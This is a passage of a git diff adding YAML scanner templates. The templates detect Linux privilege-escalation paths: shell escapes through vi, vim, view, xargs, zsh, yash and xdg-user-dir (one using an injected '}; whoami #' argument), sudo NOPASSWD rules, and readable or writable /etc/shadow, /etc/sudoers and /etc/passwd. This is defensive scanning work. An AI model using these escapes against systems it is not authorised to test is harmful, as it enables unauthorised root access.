'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml new file mode 100644 index 0000000000..07f5af0cc1 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-vi + +info: + name: Vi - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/vi/ + metadata: + verified: true + tags: code,linux,vi,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + vi -c '!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo vi -c '!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-view.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-view.yaml new file mode 100644 index 0000000000..acc083f434 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-view.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-view + +info: + name: View - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/view/ + metadata: + verified: true + tags: code,linux,view,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + view -c ':!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo view -c ':!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml new file mode 100644 index 0000000000..f719a656ea --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-vim + +info: + name: Vim - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/vim/ + metadata: + verified: true + tags: code,linux,vim,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + vim -c '!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo vim -c '!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml new file mode 100644 index 0000000000..4398b539f9 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-xargs + +info: + name: Xargs - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/xargs/ + metadata: + verified: true + tags: code,linux,xargs,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + xargs -a /dev/null whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo xargs -a /dev/null whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml new file mode 100644 index 0000000000..59238e7bbb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-xdg-user-dir + +info: + name: xdg-user-dir - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/xdg-user-dir/ + metadata: + verified: true + tags: code,linux,xdg-user-dir,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + xdg-user-dir '}; whoami #' + + #SUDO + - engine: + - sh + - bash + source: | + sudo xdg-user-dir '}; whoami #' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml new file mode 100644 index 0000000000..ec4a5e0742 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-yash + +info: + name: Yash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/yash/ + metadata: + verified: true + tags: code,linux,yash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + yash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo yash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml new file mode 100644 index 0000000000..d5b428b099 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-zsh + +info: + name: Zsh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/zsh/ + metadata: + verified: true + tags: code,linux,zsh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + zsh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo zsh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/readable-writable-etc-shadow.yaml b/code/privilege-escalation/linux/readable-writable-etc-shadow.yaml new file mode 100644 index 0000000000..ef35c08596 --- /dev/null +++ b/code/privilege-escalation/linux/readable-writable-etc-shadow.yaml @@ -0,0 +1,43 @@ +id: readable-writable-etc-shadow + +info: + name: /etc/shadow writable or readabel - Privilege Escalation + author: daffainfo + severity: high + reference: + - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow + metadata: + verified: true + tags: code,linux,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + - engine: + - sh + - bash + source: | + [ -r "/etc/shadow" ] || [ -w "/etc/shadow" ] && echo "Either readable or writable" || echo "Not readable and not writable" + + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: word + part: code_2_response + words: + - "Either readable or writable" + + - type: word + part: code_2_response + words: + - "Not readable and not writable" + negative: true \ No newline at end of file diff --git a/code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml b/code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml new file mode 100644 index 0000000000..6a5f3846f8 --- /dev/null +++ b/code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml @@ -0,0 +1,43 @@ +id: readable-writable-etc-sudoers + +info: + name: /etc/sudoers writable or readable - Privilege Escalation + author: daffainfo + severity: high + reference: + - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#etc-sudoers-etc-sudoers.d + metadata: + verified: true + tags: code,linux,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + - engine: + - sh + - bash + source: | + [ -r "/etc/sudoers" ] || [ -w "/etc/sudoers" ] && echo "Either readable or writable" || echo "Not readable and not writable" + + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: word + part: code_2_response + words: + - "Either readable or writable" + + - type: word + part: code_2_response + words: + - "Not readable and not writable" + negative: true \ No newline at end of file diff --git a/code/privilege-escalation/linux/sudo-nopasswd.yaml b/code/privilege-escalation/linux/sudo-nopasswd.yaml new file mode 100644 index 0000000000..a5dd48786b --- /dev/null +++ b/code/privilege-escalation/linux/sudo-nopasswd.yaml @@ -0,0 +1,26 @@ +id: sudo-nopasswd + +info: + name: Sudo NOPASSWD - Privilege Escalation + author: daffainfo + severity: high + description: Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password. + reference: + - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#nopasswd + metadata: + verified: true + tags: code,linux,sudo,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + sudo -l + + matchers: + - type: word + part: code_1_response + words: + - "(root) NOPASSWD:" \ No newline at end of file diff --git a/code/privilege-escalation/linux/writable-etc-passwd.yaml b/code/privilege-escalation/linux/writable-etc-passwd.yaml new file mode 100644 index 0000000000..0f0d42cf42 --- /dev/null +++ b/code/privilege-escalation/linux/writable-etc-passwd.yaml @@ -0,0 +1,31 @@ +id: writable-etc-passwd + +info: + name: /etc/passwd writable - Privilege Escalation + author: daffainfo + severity: high + reference: + - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-passwd + metadata: + verified: true + tags: code,linux,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + [ -w "/etc/passwd" ] && echo "Writable" || echo "Not writable" + + matchers: + - type: word + part: code_1_response + words: + - "Writable" + + - type: word + part: code_1_response + words: + - "Not writable" + negative: true \ No newline at end of file